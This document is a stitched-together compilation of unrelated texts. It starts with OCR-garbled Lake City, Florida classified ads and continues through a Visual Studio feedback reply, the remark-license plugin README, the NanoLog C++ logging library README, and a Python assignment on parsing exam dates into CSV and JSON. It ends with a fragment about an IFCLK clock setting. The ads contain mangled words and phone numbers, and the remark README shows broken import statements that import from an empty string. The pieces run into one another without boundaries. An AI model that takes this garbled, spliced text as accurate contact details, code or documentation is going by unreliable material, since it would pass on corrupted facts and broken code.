Pa'i. horne .eekends. , (3s 2(4-3 172 Wallh' Lite Oak Foird i.. looking for ar experienced To' Truck Dri'er. Must have Class D License. Includes benefits. Call Rick 380-362:1112 lf.r appt. EOE W ANTED EXPERIENCED \\ait stalt for A Place In The Park Cate. \Whie Spnngs. 386-.3L-141 I or 3S6-752-1952 ,ANTED! WANTED! WANTED! HARDWORKERS ONLY NEEDAPPL1. \LL SHIFTS MUST BE ABLE TO LIFT 50ILBS-7IILBS 3S6-55-1Pu91 WAL-STAF PERSON N E L REQ. , %$ANTED!!! ASSISTANT EXPERIENCED WITH TILE AND MARBLE MUST BE ABLE TO LIFT UPTO70LBS . PLEASE CALL FOR APPT. WAL-STAFF PERSONNEL 386-755-1991 Drug Screen & Backgrd Req. 
WAREHOUSE. BODY PARTS OF AMERICA seeks team oriented, hardworking individuals. Health, dental, life insurance available. Monday-Friday. If you are not afraid of honest, hard work, apply in person at: 385 SW Arlington Rd, Lake City (no phone calls please.)

WINDOW service technician needed. Experience a plus but not necessary. Must have knowledge of Lake City, Gainesville & Macclenny areas and be able to lift heavy objects. Good benefits offered after 90 days (100% employee medical & life ins.), 401K & vacation offered after 1 yr. of employment. Pick up application at Lake City Industries, 250 Railroad Street.

100 Job Opportunities: If you are a safe, dependable driver, Class A CDL, clean MVR. Part time & full time drivers needed. Home every night, weekends off. Good benefits. Columbia Grain, 755-7700.

Sales Employment: EXPERIENCED FLOORING sales person needed. Top pay. Call Brad or Martha at 386-362-7066.

ORLANDO WELCOME Center on US 90, Lake City, is looking for sales people. Commission base only. Contact Wilma, 386-755-4250.

REGISTERED NURSES. SHANDS AT LAKE SHORE. The following positions are currently available and we are seeking qualified applicants: OB, ICU, ER, MED/SURG. RN Per Diem Pool: $26.00 per hour plus shift differential. For more information contact Human Resources at 386-754-8147. Apply in person at 368 NE Franklin St, Lake City, Florida 32055, or visit our website at www.shands.org. EOE, M/F/D/V. Drug Free Workplace.

CNA. Advent Christian Village, 658-JOBS (5627). Certified Nursing Assistants! The Advent Christian Village is looking for FT and PT CNAs who want to give quality care. Florida certification required. Great working environment. Competitive salary. Competitive benefits for FT positions include: health, dental, life, disability, savings, AFLAC supplemental policies, access to onsite daycare and fitness facilities. EOE; Drug Free Workplace. Criminal background checks required.
Apply in person at ACV Personnel Department, Mon. thru Fri., 9:00 a.m. until 4:00 p.m., Carter Village Hall, 10680 CR 136, Dowling Park, FL; fax resume to (386) 658-5160; or visit.

PT Physical Therapy Assistant. Avalon Healthcare Center is currently accepting applications for a part time Physical Therapist Assistant. Qualified candidate must be State Licensed. If you want to work in an environment where caring truly makes a difference, please contact Tony Anderson, Administrator, Avalon Healthcare Center, 1270 S.W. Main Blvd, Lake City, FL 32025. 386-752-7900. Drug Free Workplace.

OT & LPTA Positions. Advent Christian Village, 658-JOBS, for current opportunities. PT PTA to assist physical therapist with physical rehabilitation and related activities. Valid Florida PTA license required. Prior experience preferred. PT OT to assist for long-term care facility. Valid Florida OT license required. Prior experience preferred. EOE; Drug Free Workplace. Criminal background verification required. Apply in person at ACV Personnel Department, Mon.-Fri., 9:00 a.m. until 4:00 p.m., Carter Village Hall, 10680 CR 136, Dowling Park, FL. Fax resume to (386) 658-5160 or visit.

...Person. Dental terminology a must. Live Oak/Lake City. $9.25 hr. Fax resume to: 386-961-9086.

RN CLINICAL COORDINATOR. Lake City Medical Center has this position open: FT nights. Requirements are: RN License, BLS Certification and previous exp. preferred. Please apply in person at: Lake City Medical Center, Human Resources, 340 NW Commerce Dr, Lake City, FL 32055.

Medical Employment: MEDICAL OFFICE, 1 day a week, Wednesday only. 386-755-14-S.

Now Hiring FT Dietary Technician for 180-bed LTC facility. Experience preferred; salary based on training & experience.
Contact Bette Forshaw, NHA, @ 386-362-7860 or apply in person: Suwannee Health Care Center, 1620 E Helvenston Street, Live Oak, Florida 32064. EOE, DV, M/F.

SUWANNEE MEDICAL Personnel. LPN needed 3-11 & weekends in Lake City area. Ask for Theresa or Melissa, 1-877-755-1544 or 755-1544.

LAB PUPPIES for sale. 8 weeks old w/hc and vacs. 1 female & 4 males, black. 386-752-9649.

310 Pets & Supplies
1 WC adult gray rat snake. 386-697-3147.
2 Jungle Carpet Pythons, male/female pair, $300. 386-697-3147.
4'x3' WOOD+PLEXI cage, $120-all OBO. 697-3147.
55 GALLON aquarium + top & stand, $100. 386-697-3147.
FREE PUPPIES. 8 weeks old, Boxer / Texas leopard mix. 386-755-7729.

PUBLISHERS NOTE: Florida law requires dogs and cats being sold to be at least 8 weeks old and have a health certificate from a licensed veterinarian documenting they have mandatory shots and are free from intestinal and external parasites. Many species of wildlife must be licensed by Florida Fish and Wildlife. If you are unsure, contact the local office for information.

Valentine Pomeranian Puppies. 8 weeks, health cert., 3 males / 1 female. 386-758-5525.

401 Antiques
ANTIQUE BRASS bed, $250 or best offer. 386-719-3846.
Primitive table, pegs, walnut, $125 or best offer. 386-719-3846.

408 Furniture
4x8 glass PATIO TABLE with four chairs, $150. 386-752-9500.
Bedroom set, lt. birch color, exc. cond. Incl. queen sz. headboard, chest of drawers, 1 night stand, 1 dresser w/ framed mirror. $600. 754-0156.

416 Sporting Goods
REGULATION POOL table. All accessories. $2500. 755-3411.
MAGNAVOX 42" color console TV w/ surround sound capability. Good cond. $450. 386-755-1053 / 386-288-8833.

420 Wanted to Buy
K&H Timber Co. Payment in advance for standing pine timber. Large or small tracts. Call 386-758-7636.

430 Garage Sales
PUBLISHER'S NOTE: Effective October 1, 2003, all yard sale ads must be prepaid.

440 Miscellaneous
DIRECT SATELLITE systems installed free, no equipment to buy. Call 961-8415.
GUN SHOW, Feb. 19 & 20th, 9a-4p, Columbia Co. Fairgrounds, Hwy 247, Lake City. Concealed weapons classes twice daily. Info: 904-461-0273.
NEW single GARAGE door. Auto open w/ 2 remotes. 386-466-1818.

630 Mobile Homes for Rent
2BR/2BA, 1/2 furnished, secluded on 1 acre. 1st, last & security. 386-623-5117.
Avail. at Waynes RV Resort: 2 or 3 BR MH, incl. water, sewer, cable TV, pest service & laundry. Call for more details. 386-752-5721.
IN PARK Mobile Homes for Rent. 2BR/2BA. 1st & sec. required. Applications & references required. 386-719-2423.
Lake City & Ellisville area: 3br/2ba & 2br/1ba MH's. Several avail. Water, garbage & yard. $400 mo., $200 security. 386-963-1568.
LATE MODEL MOBILE HOMES starting $365 month. Beautiful pond setting w/trees. CH/A & cable. No pets. Call 386-961-0017.

640 Mobile Homes for Sale
2002 FLEETWOOD. Custom made 28x76. Mint cond. 5br/4ba, all appl. Take over payments of $405/mo. & move. (352) 628-7303.
FOR AS LITTLE AS $500 DOWN @ 386-752-7751.
If you own land, or have a large down payment, I may owner finance a home for you! Call Steve, 386-365-8549.
NO MONEY DOWN! New 2005 doublewide on your land, $334 per month. Call Lee.
One of a kind Manufactured Log Home, 4 bedroom. Perfect for a country setting. Call Jim, 386-303-1557.
THANK YOU! From all the Freedom Homes family.
TIMBERLANE MHP. Adult park in Lake City. 3br/2ba split plan DWMH w/big kitchen & lg shed. All appliances. 269 SW Woodberry Ct. $36,000. 386-758-9640.
TRIPLE WIDE ON 17 ACRES IN OLD TOWN. CALL BOBBY @ 386-752-7751.
WE HAVE FHA, VA & CONVENTIONAL LOAN PROGRAMS WITH LOW DOWN. CALL 1-800-355-9385.
We love CASH! We will give you the very best price for a new or used manufactured home! 386-752-5355.
WE SPECIALIZE IN LAND HOME PACKAGES. 386-752-7751.

650 Mobile Home & Land
...& White Springs. Possible lease opt. 386-752-1212.
LAND and HOME packages, close to Lake City: it's what we do best! Paved street, city water and sewer. You pick the home, we do the rest, and Freedom Homes may owner finance! 386-752-5355.
REMODELED manufactured home on land. Call Ron, 386-397-4060.
TRIPLEWIDE on 1.8 acres land. MUST SELL!! 386-397-4930, ask for Faye.

705 Rooms for Rent
ROOMMATE WANTED. $325 a month for everything. 386-697-6117.

710 Unfurnished Apt. for Rent
$NO RENT UNTIL MARCH! 2BR and 3BR special. Call today! New apartment homes include MW, DW, pool, fitness center and much more. Call Windsong.
NOW LEASING: 1 Bedroom Apartments/2BA w/ loft. $675 mo. plus security. 386-752-9626.
NEWLY PAINTED 2br/1ba w/garage, $650 mo., & 2br/1ba w/out garage, $500 mo., plus security deposit. Lea, 386-752-9626.

Accepting Applications. Good, Bad & No Credit. Call for 1st & 2nd Mortgages. Established full service co. (800) 226-6044. WE BUY MORTGAGES. 2622 NW 43rd St. #A-1, Gainesville, FL 32606. FHA/VA/Conv. Specialist. GAINESVILLE MORTGAGE COMPANY, INC. Licensed Mtg. Lender.

710 Unfurnished Apt. for Rent
X-CLEAN 2/2, 1700 sq. ft. Second floor. Private country acre. Energywise. 7 miles to VA. $600 mo. $1,500 needed. 386-961-9181.

720 Furnished Apts. for Rent
Completely furnished, clean, private, near City & Timco. 1BR apt. Nice neighborhood. Quiet & peaceful. Call 386-755-3950.
Neat as a Whistle! 1BR, hot tub, 2 car garage. Nice residential development. $895/mo. Close to Branford Hwy & 242. Call 386-397-5222.
3BR/2BA HOUSE for rent. 1st, last & deposit required. Call 386-755-6867 for more information.
Avail. now! 3/2, 1864 SE CR 245A, Lake City. Big yard, screened porch, big laundry rm., new appl. $700 dep., $800 mo. Judy, 904-814-2855 or 912-843-8151.

PUBLISHER'S NOTE: All real estate advertising in this newspaper is subject to the Fair Housing Act which makes it illegal to advertise "any preference,
limitation or discrimination based on race, color, religion, sex, disability, familial status or national origin, or any intention to make such preference, limitation or discrimination." Familial status includes children under the age of 18 living with parents or legal custodians, pregnant women, and people securing custody of children under 18. This newspaper will not knowingly accept any advertising for real estate which is in violation of the law. Our readers are hereby informed that all dwellings advertised in this newspaper are available on an equal opportunity basis. To complain of discrimination call HUD toll-free at 1-800-669-9777. The toll-free telephone number for the hearing impaired is 1-800-927-9275.

750 Business & Office Rentals
Building for lease. 2128 SW Main Blvd., Suite 105. Approx. 1200 sq ft., utilities incl. $950 per month. 386-752-5035. A Bar Sales Inc. Days 7am-7pm.
OFFICE SPACE for lease. 1,000 sq. ft. for prof. office. Downtown location. Call Sandy, 386-344-0433. Daniel Crapps Agency.

805 Lots for Sale
HILLTOP HOMESITE on paved road in restricted community. Overlooks natural woodlands on creek. Only $49,900 for acres. 386-752-5035 Ext. 9710. Days 7am-7pm. A Bar Sales Inc.
STAR LAKE ESTATES. 1/2 to 3/4 ac. Lake access, restricted home sites. 2 miles from I-75 & US 90. From $26,900. 386-365-1563 or 365-8007.

810 Home for Sale
$29,900! 4br/2ba foreclosure available now! For listing call toll-free, ext. H411.
3BR/2BA HOUSE w/ garage, 8x12 storage shed. Quail Ridge Estates. 1/3 acre in quiet neighborhood. $96,500 neg. 386-935-0253.
3BR/2BA, LR-DR, kitchen equipped, back porch, patio, 2 car garage, 1603 sq ft. 14x38 RV garage, enclosed & outbuilding. 386-755-2190.
FSBO New Home. 3BR/2BA, 1,400 sq ft, 1/3 acre, CHA, kit. appl., off Country Club Rd, asking $115,000,
call 386-867-0124.
SINGLE STORY Townhouse, 2BR/2BA. Desirable neighborhood, perfect for retirees. Ceramic tile kit/bath. City water & sewer. Just off SW Grandview St. $79,500. 386-755-0210.
WE BUY Houses & Land & Fixer-uppers! Call for more information. 386-755-6092.

820 Farms & Acreage
5, 10 and 20 acre lots with well and septic tank. Owner financing. 386-752-4339.
BEAUTIFUL 5 ac. restricted home sites on paved road. 3 & 1/2 miles from I-75 & US 90. From $48,900. 386-365-1563 or 365-8007.

870 Real Estate Wanted
WE PAY CASH for cut over timber land. 386-365-3865.

920 Auto Parts & Supplies
00 OLDS Alero, silver. PW, PL. Nice car. Call Andy, 386-758-6171.
01 IMPALA LS, black. PW, PL, tilt. Call Andy, 386-758-6171.
02 Chrysler PT Cruiser, 4 door, black. PW, PL. Call Andy, 386-758-6171.
02 FORD Escape. PW, PL. New car trade. Call Andy, 386-758-6171.
03 GALANT. PW, PL, tilt, cruise. Come drive it! Call Andy, 386-758-6171.
03 NISSAN Sentra, loaded. Auto w/ alloys. Exc. fuel miles. Only 36K mi. Like new. $12,000. Please call Jimmy @ 386-752-5050.
1992 GEO PRISM. Parts only. Call 935-0509.
35 MPG & Dell CPU: Buy a 2005 Focus Hatch, Sedan, or Wagon, get up to $2,500 rebate & a free Dell system. Call today, 386-623-1946.
87 TOYOTA CAMRY, automatic. $1099. 386-466-1818.
98 CADILLAC Deville. All the toys. Exc. cond. Lthr pwr seats, alloys. $16,100. Please call Jimmy @ 386-752-5050.
LOWEST PRICES of the year! Lincoln Navigator, Lincoln Aviator, Ford Expedition, Lincoln LS, Ford T-Bird. Call today.

951 Recreational Vehicles
04 FRANKLIN 39' 5th wheel. 2br, 3 elec. slide outs. Garden tub/shower, washer/dryer, stereo & CD. Every option. $25,500.
95 Savannah, 33ft 5th wheel, new hitch incl. Sleeps 6, Super Slide, fully loaded, 1 owner. New tires. Owned by non-smoker. $11,950 obo. Will deliver. 386-288-9031.

952 Vans & Sport Util. Vehicles
1996 FORD Windstar. Needs work. $500 obo. 386-963-5201 evenings, 963-5953 days.
1999 GMC JIMMY, V-6, loaded, new tires. $5,500. 386-755-1053.
SEATS SEVEN: Brand new 2004 Mercury Monterey. Leather, power rear doors, keyless remote. $12,000 off! 3 left. 386-623-1946 / 752-3300.
I sometimes work in a very different way: I group classes in files by their purpose, and use namespaces and regions to give order. It has its drawbacks, I know. Even if I'm doing it wrong, it is possible to have more than one class in a single file. What if you have more than one partial class in the same file? How will you group them? I vote for labels in the Solution Explorer, with automatic labels for partial classes: you choose a label, and you only see the files of that label. <--- Another way may be to have some name convention (I think you have one), and add an option to filter files by partial name. <--- Or both. <----

Thank you for your feedback. This is an excellent suggestion. This is very much the way that WinForms and ASP.NET pages separate out the user code from the designer code. However, we are currently at the end of our development cycle, and we do not have time to fit this in. I am going to close this suggestion as "Won't Fix" and we will take a look at it again during our next product cycle. Thanks, Chuck England, Visual Studio Platform Program Manager - Project & Build
remark-license

remark plugin to generate a license section.

Contents

- What is this?
- When should I use this?
- Install
- Use
- API
- Types
- Compatibility
- Security
- Related
- Contribute
- License

What is this?

This package is a unified (remark) plugin to generate a license section such as the one at the bottom of this readme.

unified is a project that transforms content with abstract syntax trees (ASTs). remark adds support for markdown to unified. mdast is the markdown AST that remark uses. This is a remark plugin that transforms mdast.

When should I use this?

This project is useful when you're writing documentation for an open source project, typically a Node.js package, that has one or more readmes and maybe some other markdown files as well. You want to show the author and license associated with the project. When this plugin is used, authors can add a certain heading (say, `## License`) to documents and this plugin will populate them.

Install

This package is ESM only. In Node.js (version 12.20+, 14.14+, or 16.0+), install with npm:

```sh
npm install remark-license
```

```js
import remarkLicense from ''
```

In browsers with Skypack:

```html
<script type="module">
  import remarkLicense from ''
</script>
```

Use

Say we have the following file `example.md` in this project:

```markdown
# Example

Some text.

## Use

## API

## License
```

And our module `example.js` looks as follows:

```js
import {read} from 'to-vfile'
import {remark} from 'remark'
import remarkLicense from 'remark-license'

main()

async function main() {
  const file = await remark()
    .use(remarkLicense)
    .process(await read('example.md'))

  console.log(String(file))
}
```

Now running `node example.js` yields:

```markdown
# Example

Some text.

## Use

## API

## License

[MIT](license) © [Titus Wormer]()
```

👉 Note: This info is inferred from this project's `package.json` and `license` file. Running this example in a different package will yield different results.

API

This package exports no identifiers. The default export is `remarkLicense`.
`unified().use(remarkLicense[, options])`

Generate a license section. In short, this plugin:

- looks for the heading matching `/^licen[cs]e$/i` or `options.heading`
- if there is a heading, replaces it with a generated license section

options

Configuration (optional in Node.js, required in browsers).

options.name: License holder (`string`). In Node.js, defaults to the `author` field in the closest `package.json`. Throws when neither given nor detected.

options.license: SPDX identifier (`string`). In Node.js, defaults to the `license` field in the closest `package.json`. Throws when neither given nor detected.

options.file: File name of license file (`string`, optional). In Node.js, defaults to a file in the directory of the closest `package.json` that matches `/^licen[cs]e(?=$|\.)/i`. If there is no given or found license file, but `options.license` is a known SPDX identifier, then the URL to the license on spdx.org is used.

options.url: URL to license holder (`string`, optional). In Node.js, defaults to the `author` field in the closest `package.json`. `http://` is prepended if `url` does not start with an HTTP or HTTPS protocol.

options.ignoreFinalDefinitions: Ignore definitions that would otherwise trail in the section (`boolean`, default: `true`).

options.heading: Heading to look for (`string` (case insensitive) or `RegExp`, default: `/^licen[cs]e$/i`).

Security

`options.url` (or `author.url` in `package.json`) is used and injected into the tree when it's given or found. This could open you up to a cross-site scripting (XSS) attack if you pass user-provided content in or store user-provided content in `package.json`. This may become a problem if the markdown is later transformed to rehype (hast) or opened in an unsafe markdown viewer.

Related

- remark-collapse – make some sections collapsible
- remark-contributors – generate a contributors section
- remark-toc – generate a table of contents
- remark-usage – generate a usage example

Contribute

See contributing.md in remarkjs/.github for ways to get started.
See support.md for ways to get help. This project has a code of conduct. By interacting with this repository, organization, or community you agree to abide by its terms.
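When the `package.json` fields are unavailable (for example in browsers, where the options are required), everything can be supplied explicitly. A sketch with made-up values; only the option names come from the API section earlier, the holder name and URL are illustrative:

```js
import {remark} from 'remark'
import remarkLicense from 'remark-license'

const file = await remark()
  .use(remarkLicense, {
    name: 'Jane Doe',           // hypothetical license holder
    license: 'MIT',             // SPDX identifier
    url: 'https://example.com'  // linked from the holder's name
  })
  .process('# Example\n\n## License\n')

console.log(String(file))
```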
NanoLog is an extremely performant nanosecond-scale logging system for C++ that exposes a simple printf-like API and achieves over 80 million logs/second at a median latency of just over 7 nanoseconds. It achieves this performance by extracting static log information at compile time, logging only the dynamic components in the runtime hot path, and deferring formatting to an offline process. This shifts work out of the runtime and into the compilation and post-execution phases. For more information about the techniques used in this logging system, please refer to either the NanoLog paper published in the 2018 USENIX Annual Technical Conference or the original author's doctoral thesis.

This section compares the performance of NanoLog with existing logging systems such as spdlog v1.1.0, Log4j2 v2.8, Boost 1.55, glog v0.3.5, and Windows Event Tracing with the Windows Software Trace Preprocessor on Windows 10 (WPP).

Maximum throughput was measured with 1 million messages logged back to back with no delay and 1-16 logging threads (NanoLog logged 100 million messages to generate a log file of comparable size). ETW is "Event Tracing for Windows." The log messages used can be found in the Log Message Map below.

Latency was measured in nanoseconds; each cell represents the 50th / 99.9th percentile tail latencies. The log messages used can be found in the Log Message Map below.
| Message       | NanoLog | spdlog      | Log4j2      | glog        | Boost        | ETW       |
|---------------|:-------:|:-----------:|:-----------:|:-----------:|:------------:|:---------:|
| staticString  | 7 / 37  | 214 / 2546  | 174 / 3364  | 1198 / 5968 | 1764 / 3772  | 161 / 2967|
| stringConcat  | 7 / 36  | 279 / 905   | 256 / 25087 | 1212 / 5881 | 1829 / 5548  | 191 / 3365|
| singleInteger | 7 / 32  | 268 / 855   | 180 / 9305  | 1242 / 5482 | 1914 / 5759  | 167 / 3007|
| twoIntegers   | 8 / 62  | 437 / 1416  | 183 / 10896 | 1399 / 6100 | 2333 / 7235  | 177 / 3183|
| singleDouble  | 8 / 43  | 585 / 1562  | 175 / 4351  | 1983 / 6957 | 2610 / 7079  | 165 / 3182|
| complexFormat | 8 / 40  | 1776 / 5267 | 202 / 18207 | 2569 / 8877 | 3334 / 11038 | 218 / 3426|

Log messages used in the benchmarks above. Italics indicate dynamic log arguments.

| Message ID    | Log Message Used |
|---------------|------------------|
| staticString  | Starting backup replica garbage collector thread |
| singleInteger | Backup storage speeds (min): *181* MB/s read |
| twoIntegers   | buffer has consumed *1032024* bytes of extra storage, current allocation: *1016544* bytes |
| singleDouble  | Using tombstone ratio balancer with ratio = *0.4* |
| complexFormat | Initialized InfUdDriver buffers: *50000* receive buffers (*97* MB), *50* transmit buffers (*0* MB), took *26.2* ms |
| stringConcat  | Opened session with coordinator at *basic+udp:host=192.168.1.140,port=12246* |

Currently NanoLog only works for Linux-based systems and depends on the following:

* C++17 Compiler: GNU g++ 7.5.0 or newer
* GNU Make 4.0 or greater
* Python 3.4.2 or greater
* POSIX AIO and Threads (usually installed with Linux)

The NanoLog system enables low-latency logging by deduplicating static log metadata and outputting the dynamic log data in a binary format. This means that log files produced by NanoLog are in binary and must be passed through a separate decompression program to produce the full, human-readable ASCII log.

There are two versions of NanoLog (the Preprocessor version and the C++17 version) and you must choose one to use with your application, as they're not interoperable.
The biggest difference between the two is that the Preprocessor version requires one to integrate a Python script into their build chain, while the C++17 version is closer to a regular library (simply build it and link against it). The benefit of using the Preprocessor version is that it performs more work at compile time, resulting in a slightly more optimized runtime. If you don't know which one to use, go with C++17 NanoLog as it's easier to use.

The C++17 version of NanoLog works like a traditional library: just `#include "NanoLogCpp17.h"` and link against the NanoLog library. A sample application can be found in the sample directory.

To build the C++17 NanoLog runtime library, go into the runtime directory and invoke `make`. This will produce `./libNanoLog.a` to link your application against and a `./decompressor` application that can be used to re-inflate the binary logs.

When you compile your application, be sure to include the NanoLog header directory (`-I ./runtime`), link against NanoLog, pthreads, and POSIX AIO (`-L ./runtime/ -lNanoLog -lrt -pthread`), and enable format checking in the compiler (e.g. passing in `-Werror=format` as a compilation flag). The latter step is incredibly important, as format errors may silently corrupt the log file at runtime. Sample g++ invocations can be found in the sample GNUmakefile.

After you compile and run the application, the generated log file can then be passed to the `./decompressor` application to generate the full human-readable log file (instructions below).

The Preprocessor version of NanoLog requires a tighter integration with the user build chain and is only for advanced/extreme users. It requires the user's GNUmakefile to include the NanoLogMakeFrag, declare USRSRCS and USROBJS variables to list all the app's source and object files respectively, and use the pre-defined `run-cxx` macro (instead of g++) to compile ALL the user .cc files into .o files. See the preprocessor sample GNUmakefile for more details.
Internally, the `run-cxx` invocation will run a Python script over the source files and generate library code that is specific to each compilation of the user application. In other words, the compilation builds a version of the NanoLog library that is non-portable, even between compilations of the same application, and each `make` invocation rebuilds this library. Additionally, the compilation should also generate a `./decompressor` executable in the app directory, and this can be used to reconstitute the full human-readable log file (instructions below).

The sample applications are intended as a guide for how users are to interface with the NanoLog library. Users can modify these applications to test NanoLog's various API and functionality. The C++17 and Preprocessor versions of these applications reside in ./sample and ./sample_preprocessor respectively. One can modify `main.cc` in each directory, build/run the application, and execute the decompressor to examine the results. Below is an example for C++17 NanoLog's sample application:

```bash
cd sample
nano main.cc
make clean-all
make
./sampleApplication
./decompressor decompress /tmp/logFile
```

Note: The sample application sets the log file to `/tmp/logFile`.

To use the NanoLog system in the code, one just has to include the NanoLog header (either NanoLogCpp17.h for C++17 NanoLog or NanoLog.h for Preprocessor NanoLog) and invoke the `NANO_LOG()` function in a similar fashion to printf, with the exception of a log level before it. Example below:

```cpp
#include "NanoLogCpp17.h"
using namespace NanoLog::LogLevels;

int main() {
    NANO_LOG(NOTICE, "Hello World! This is an integer %d and a double %lf\r\n", 1, 2.0);
    return 0;
}
```

Valid log levels are DEBUG, NOTICE, WARNING, and ERROR, and the logging level can be set via `NanoLog::setLogLevel(...)`. The rest of the NanoLog API is documented in the NanoLog.h header file.
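For instance, combining the two calls named above gives a run that records only NOTICE-and-above messages. This is a sketch only: it uses just `NANO_LOG` and `NanoLog::setLogLevel` as described in this document, and must be compiled and linked against the NanoLog library as shown earlier, so it is not a standalone program:

```cpp
#include "NanoLogCpp17.h"
using namespace NanoLog::LogLevels;

int main() {
    // Suppress DEBUG messages at runtime; NOTICE, WARNING, and ERROR still log.
    NanoLog::setLogLevel(NOTICE);

    NANO_LOG(DEBUG, "Filtered out at runtime");
    NANO_LOG(WARNING, "Queue depth %d exceeded threshold %d", 128, 100);
    return 0;
}
```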
The execution of the user application should generate a compressed, binary log file (default locations: ./compressedLog or /tmp/logFile). To make the log file human-readable, simply invoke the `decompressor` application with the log file:

```bash
./decompressor decompress ./compressedLog
```

After building the NanoLog library, the decompressor executable can be found in either the ./runtime directory (for C++17 NanoLog) or the user app directory (for Preprocessor NanoLog).

The NanoLog project contains a plethora of tests to ensure correctness. Below is a description of each and how to access/build/execute them.

The integration tests build and test the NanoLog system end-to-end. For both C++17 NanoLog and Preprocessor NanoLog, they compile a client application with the NanoLog library, execute the application, and run the resulting log file through the decompressor. They additionally compare the output of the decompressor to ensure that the log contents match the expected result. One can execute these tests with the following commands:

```bash
cd integrationTest
./run.sh
```

The NanoLog library and Preprocessor engine also contain a suite of their own unit tests. These test the inner workings of each component by invoking individual functions and checking that their returns match the expected results. To run the NanoLog preprocessor unit tests, execute the following commands:

```bash
cd preprocessor
python UnitTests.py
```

To build and run the NanoLog library unit tests, execute the following commands:

```bash
git submodule update --init
cd runtime
make clean
make test
./test --gtest_filter=-assert
```

Note: The gtest filter is used to remove tests with assert death statements in them.
“A friend sent me a list of exams”

The input

You receive this string from a friend; it represents a list of all his/her examinations. You copy it and you store it in a .txt file.

"""
Samedi 23 : 14h - 18h : MES (Méthodologie Enquête Sondage)
Mardi 26 : 16h30 - 18h30 : Finance
Samedi 6 juin : 9-12 : stats 2ème
16 juin : : Oral Ndls
"""

You can retrieve the information of "when you saved it to a txt file" using the "last-time modified date" of the file (or on Windows, you can choose the "created date"). This information is easily available in Python. You must parse the string into the following format:

{day_of_week}, {year}-{month}-{day}, {hour}:{minute}, {end_hour}:{end_minute}, {name}

The day of week must be in lowercase; a parameter can be added to your program to choose the language.

The csv file and the ods file

This file will be saved as a "csv" file. In our example, the .csv file would look like this (but of course this should work with other values):

samedi, 2020-05-23, 14:00, 18:00, MES (Méthodologie Enquête Sondage)
mardi, 2020-05-26, 16:30, 18:30, Finance
samedi, 2020-06-06, 09:00, 12:00, stats 2ème
mardi, 2020-06-16, unknown, unknown, Oral Ndls

In the beginning you don't have to write directly to a file; you can use print.

The ods file and some graphs

- Create a graph where X = date of the exam and Y = hour of the beginning of the exam. If the hour is unknown, remove the exam from the graph.
- Create a bar graph where each bar is labelled by the name of the exam and the value is the hour of beginning. Note: if the hour is unknown, remove the exam from the graph.

Note: if you need, you can add another column being the "timestamp" of the date of the exam. A popular timestamp format is the "Unix timestamp".
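For instance, the optional Unix-timestamp column mentioned above can be computed with the standard library alone. The date below is the first exam from the sample input; pinning it to UTC (an assumption, the assignment does not specify a timezone) keeps the value reproducible on any machine:

```python
from datetime import datetime, timezone

# 2020-05-23 14:00, the first exam in the sample list, pinned to UTC.
exam_start = datetime(2020, 5, 23, 14, 0, tzinfo=timezone.utc)
print(int(exam_start.timestamp()))  # -> 1590242400
```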
The matrix and the json file

After that, if you want, write code that reads the csv file and converts it into one of those Python formats.

Choice 1: A matrix where lines are like

["samedi", 2020, 5, 23, 14, 0, 18, 0, "MES (Méthodologie Enquête Sondage)"]

Choice 2: A list of dictionaries like

{
    "day": "samedi",
    "date": "2020-05-23",
    "name": "MES (Méthodologie Enquête Sondage)",
    "beg_hour": 14,
    "beg_min": 0,
    "end_hour": 18,
    "end_min": 0
}

The two formats can be saved as a json file (using the import json module). You can then compute, for example, the total length of all of the exams.

Specification details

1) If no month is provided, as when "mardi 26" is written:
1.1) (easy) you can consider it to be the current month (or the month of the message's date)
1.2) (hard) search the current year for the day matching the given information: "mardi 23" will search for all Tuesdays the 23rd; if two such dates exist, raise a ValueError (using raise ValueError with a message saying "There exist two mardi 23 for year 2020").

2) When you don't know what to choose, add a parameter to your program (using input or sys.argv or argparse).

3) The name of the file to translate can also be a parameter of the program.

Some tips

- Read "théorie 2", especially the part talking about "string" (theory 2).
- To open a txt file, read the theory about files.
- Here is another theory file about matrices and dictionaries.
- To manage datetimes, use from datetime import datetime. For instance datetime(2020, 5, 20) can be used to create a datetime, and datetime.now() will give the current time as a datetime.
- To convert from and to json files, use import json.
- To know more about modules (like random, datetime or json), read the module theory file.
- Pro tip: regex (import re)

How to hand in the assignment:

- Using a git repository: just the url, sent by mail.
- Or a zip file containing the files needed for the assignment: the txt file, your python file(s) (if more than one file, the main one should be called "main.py"), and your .ods or .xlsx file containing the graphs.

You must hand in the assignment each Friday (if you have something, of course); I will respond to the mail to give you tips until you finish the assignment (some people will need 1 week, others will need more). Cite your sources when you use information from the internet! If you have any question, contact me on Messenger or by mail using the school email address, even if your question is "I did not understand this part of the assignment".
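A minimal sketch of the parsing step, using only the stdlib tools named in the tips (re, datetime). The assumptions in the comments are choices this sketch makes, not part of the assignment statement:

```python
import re
from datetime import datetime

# Assumptions of this sketch: the year is 2020, a missing month means May
# (the month of the message), and output day names are French.
MONTHS = {"mai": 5, "juin": 6}  # extend as needed
DAYS = ["lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi", "dimanche"]

def parse_hour(text):
    """'14h' -> '14:00', '16h30' -> '16:30', '9' -> '09:00'."""
    m = re.search(r"(\d{1,2})\s*[h:]?\s*(\d{2})?", text)
    if not m:
        return "unknown"
    return "{:02d}:{:02d}".format(int(m.group(1)), int(m.group(2) or 0))

def parse_line(line, year=2020, default_month=5):
    # Shape assumed: "<day name?> <day> <month name?> : <hours?> : <name>"
    head, hours, name = (part.strip() for part in line.split(":", 2))
    tokens = head.lower().split()
    day = int(next(t for t in tokens if t.isdigit()))
    month = next((MONTHS[t] for t in tokens if t in MONTHS), default_month)
    date = datetime(year, month, day)
    begin = end = "unknown"
    if "-" in hours:
        begin, end = (parse_hour(part) for part in hours.split("-", 1))
    # Day name is recomputed from the date, so "16 juin" still gets "mardi".
    return [DAYS[date.weekday()], date.strftime("%Y-%m-%d"), begin, end, name]

print(parse_line("Samedi 6 juin : 9-12 : stats 2ème"))
# -> ['samedi', '2020-06-06', '09:00', '12:00', 'stats 2ème']
```

From here, the rows can be fed to csv.writer or converted to the dictionary format and dumped with json.dump.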
https://robertvandeneynde.be/parascolaire/exos-divers/parse-exams-csv-json-ods/index.html
CC-MAIN-2020-34
refinedweb
759
73.21
Answer:

1. Please check if the external IFCLK source is present before the firmware sets IFCONFIG.7 = 0. This is necessary in order to provide synchronization for the internal endpoint FIFO logic. IFCLK should be free running.

